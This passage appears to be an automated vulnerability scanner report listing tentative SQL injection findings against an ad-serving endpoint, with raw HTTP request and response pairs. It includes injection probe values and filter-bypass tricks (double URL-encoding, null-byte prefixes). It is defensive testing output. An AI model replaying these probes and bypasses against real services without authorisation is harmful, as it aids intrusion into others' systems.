HTTP/1.1 200 OK Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2 Vary: Accept-Encoding P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC" Cache-Control: no-store, no-cache, private Pragma: no-cache Content-Type: text/html Date: Sat, 17 Sep 2011 01:22:07 GMT Content-Length: 1828 Connection: close Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:22:06 GMT; path=/ Set-Cookie: _curtime=1316222527; domain=pubmatic.com; expires=Sat, 17-Sep-2011 02:32:07 GMT; path=/
document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwidth="0" vspace="0" hspace="0" src="http://ca.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAACAAAANTU3ODUzMDctQTVEQy00RTNBLUI0NTItRERCRDQyNkQzQTFEAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAA=_url=&cost=0.7415&mapped_uid=7-55785307-A5DC-4E3A-B452-DDBD426D3A1D&us_id=6538&creative_id=130642&campaign_id=66395&source_url=http%3A%2F%2Fwww.bostonherald.com&exch_id=7&auction_id=46AD5D33-3A03-4DF5-99B7-CA6C61AD8658&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D71897565%26rk1%3D2053665%26rk2%3D1316239421.077%26pt%3D0&line_item_id=725814&invite_uid=d454714d-69b5-4195-969b-ba426f1012c3&zip_code=75207"></iframe>\');<'+'/script>'); document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="true" hspace="0" vspace="0" marginheight="0" marginwidth="0" scrolling="no" width="0" height="0" style="position:absolute;top:-20000px;" src="http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?operId=1&pubId=27330&siteId=27331&adId=23103&adServerId=243&kefact=0.500000&kpbmtpfact=0.741500&kadNetFrequecy=0&kadwidth=728&kadheight=90&kadsizeid=7&kltstamp=1316222527&indirectAdId=0&adServerOptimizerId=2&ranreq=0.31895528361201286&defaultReq=1&defaultedAdServerId=1053&kadDefNetFreq=0&campaignId=1336&creativeId=0&pctr=0.000000&imprCap=1&pageURL=http://ad.afy11.net/ad"> </iframe>'); |
1.21. http://tag.contextweb.com/TagPublish/GetAd.aspx [Referer HTTP header]
Summary
Severity: High
Confidence: Tentative
Host: http://tag.contextweb.com
Path: /TagPublish/GetAd.aspx
Issue detail
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1 Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=' User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193
Response 1
HTTP/1.1 200 OK Server: GlassFish v3 CW-Server: CW-APP207 Cache-Control: private, max-age=0, no-cache, no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT CW-Loop: 13 CWDL: 13/123 Content-Type: application/x-javascript;charset=UTF-8 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Sat, 17 Sep 2011 01:49:38 GMT Content-Length: 2565 Connection: close Set-Cookie: vf=1100; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/
document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_728x90.jpg%20height%3D90%20border%3D0%20width%3D728%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app207_5vjkeBW8txQp%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht ...[SNIP]...
Request 2
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1 Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q='' User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193
Response 2
HTTP/1.1 200 OK Server: GlassFish v3 CW-Server: CW-APP201 Cache-Control: private, max-age=0, no-cache, no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT CWDL: 12/101 Content-Type: application/x-javascript;charset=UTF-8 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Sat, 17 Sep 2011 01:49:39 GMT Content-Length: 2264 Connection: close Set-Cookie: 539292_4_107784_-1=1316224179419; Domain=.contextweb.com; Path=/ Set-Cookie: vf=1101; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/
document.write(decodeURIComponent("%3C%21--%20PubMatic%20ad%20tag%20%28Javascript%29%20%3A%20BostonHerald_728X90_ATF%20%7C%20http%3A%2F%2Fwww.bostonherald.com%2F%20%7C%20728%20x%2090%20Leaderboard%20% ...[SNIP]...
1.22. http://tag.contextweb.com/TagPublish/GetAd.aspx [ca parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://tag.contextweb.com
Path: /TagPublish/GetAd.aspx
Issue detail
The ca parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ca parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ca request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD%2527&cp=539292&ct=107784&cn=1&epid=&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1 Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193
Response 1
HTTP/1.1 200 OK Server: GlassFish v3 CW-Server: CW-APP204 Cache-Control: private, max-age=0, no-cache, no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT CW-Loop: 13 CWDL: 13/123 Content-Type: application/x-javascript;charset=UTF-8 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Content-Length: 2565 Date: Sat, 17 Sep 2011 01:46:43 GMT Connection: close Set-Cookie: vf=787; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/
document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_728x90.jpg%20height%3D90%20border%3D0%20width%3D728%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app204_cfDJ2QoPglRh%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht ...[SNIP]...
Request 2
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD%2527%2527&cp=539292&ct=107784&cn=1&epid=&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1 Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193
Response 2
HTTP/1.1 200 OK Server: GlassFish v3 CW-Server: CW-APP202 Cache-Control: private, max-age=0, no-cache, no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT CWDL: 12/101 Content-Type: application/x-javascript;charset=UTF-8 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Content-Length: 2264 Date: Sat, 17 Sep 2011 01:46:45 GMT Connection: close Set-Cookie: 539292_4_107784_-1=1316224004962; Domain=.contextweb.com; Path=/ Set-Cookie: vf=788; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/
document.write(decodeURIComponent("%3C%21--%20PubMatic%20ad%20tag%20%28Javascript%29%20%3A%20BostonHerald_728X90_ATF%20%7C%20http%3A%2F%2Fwww.bostonherald.com%2F%20%7C%20728%20x%2090%20Leaderboard%20% ...[SNIP]...
1.23. http://tag.contextweb.com/TagPublish/GetAd.aspx [cwu parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://tag.contextweb.com
Path: /TagPublish/GetAd.aspx
Issue detail
The cwu parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cwu parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the cwu request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212%2527&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 1
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP207
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:17:54 GMT
Content-Length: 2044
Connection: close
Set-Cookie: vf=489; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_300x250.jpg%20height%3D250%20border%3D0%20width%3D300%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app207_JCVEUma2gDZb%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht ...[SNIP]...

Request 2
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212%2527%2527&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 2
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP208
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/120
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 1816
Date: Sat, 17 Sep 2011 01:17:55 GMT
Connection: close
Set-Cookie: 538518_3_106142_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 538518_3_106142_-1=1316222275911; Domain=.contextweb.com; Path=/
Set-Cookie: vf=490; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20src%3D%22http%3A%2F%2Ftag.admeld.com%2Fpassback%2Fjs%2F610%2Funified%2F300x250%2F8%2Fmeld.js%22%3E%3C%2Fscript%3E%3Cdiv%20style%3D%22display%3Anone%3Bwid ...[SNIP]...
1.24. http://tag.contextweb.com/TagPublish/GetAd.aspx [cxy parameter]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://tag.contextweb.com |
| Path: | /TagPublish/GetAd.aspx |
Issue detail
The cxy parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cxy parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=%00'&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 1
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP202
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:18:45 GMT
Content-Length: 2074
Connection: close
Set-Cookie: vf=536; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:01 GMT; Path=/

document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_300x250.jpg%20height%3D250%20border%3D0%20width%3D300%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app202_NcHteBNElrNX%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht ...[SNIP]...

Request 2
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=%00''&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 2
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP209
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/101
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:18:45 GMT
Content-Length: 2372
Connection: close
Set-Cookie: 538518_3_106142_-1=1316222325784; Domain=.contextweb.com; Path=/
Set-Cookie: vf=537; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20src%3D%22http%3A%2F%2Ftag.admeld.com%2Fpassback%2Fjs%2F610%2Funified%2F300x250%2F8%2Fmeld.js%22%3E%3C%2Fscript%3E%3Cdiv%20style%3D%22display%3Anone%3Bwid ...[SNIP]...
1.25. http://tag.contextweb.com/TagPublish/GetAd.aspx [dw parameter]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://tag.contextweb.com |
| Path: | /TagPublish/GetAd.aspx |
Issue detail
The dw parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the dw parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks, but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the dw request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300%2527&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
